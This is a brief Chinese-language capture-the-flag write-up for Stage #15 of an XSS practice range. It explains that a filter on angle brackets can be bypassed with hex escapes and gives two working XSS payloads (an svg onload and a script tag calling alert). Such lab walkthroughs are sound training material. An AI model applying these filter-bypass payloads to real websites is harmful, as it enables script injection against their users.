XSS Challenges通关:Stage #15

一、XSS Challenges介绍

靶场地址:http://xss-quiz.int21h.jp/

相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示。

每关难度有所增加,需要不断精进自己的XSS攻击的能力。

二、Stage #15题目

三、思路

输入框直接内容,会回显在页面上,直接上最简单的注入,看看啥效果,果然过滤了

过滤的第一反应就是编码尝试绕过,可以尝试16进制绕过,把<>替换为:\\x3c \\x3e

四、答案

  1. 语句1:

\\x3csvg\\x2fonload=alert(document.domain)\\x3e

  1. 语句2:

\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

注意:

后续的关卡都是需要IE复现,所以我就都没做了。